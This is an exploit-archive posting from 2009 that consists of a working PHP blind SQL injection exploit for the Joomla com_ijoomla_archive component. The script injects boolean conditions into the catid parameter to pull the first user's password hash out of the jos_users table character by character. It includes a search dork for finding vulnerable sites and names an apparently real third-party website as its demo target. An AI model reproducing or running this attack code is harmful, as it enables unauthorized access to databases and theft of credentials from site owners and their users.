joomlaija-sql.txt
Posted on 05 March 2009
<?php /* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + Joomla com_ijoomla_archive Blind SQL Injection Exploit + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ AUTHOR : Mountassif Moad DATE : 5 mars 2009 ##################################################### APPLICATION : Joomla com_ijoomla_archive DORK : inurl:"com_ijoomla_archive" ##################################################### */ # ini_set("max_execution_time",0); print_r(' ############################################################### # com_ijoomla_archiv Blind SQL Injection Exploit # php '.$argv[0].' http://www.site.com/ real id # Demo : # php '.$argv[0].' http://thecatholicspirit.com/ 17 # ############################################################### '); if ($argc > 1) { $url = $argv[1]; if ($argc < 3) { $userid = 1; } else { $userid = $argv[2]; } $r = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+1=1")); echo " Exploiting: "; $w = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+1=0")); $t = abs((100-($w/$r*100))); echo " Password: "; for ($j = 1; $j <= 32; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } else { echo " Exploiting failed: find another site "; } ?>
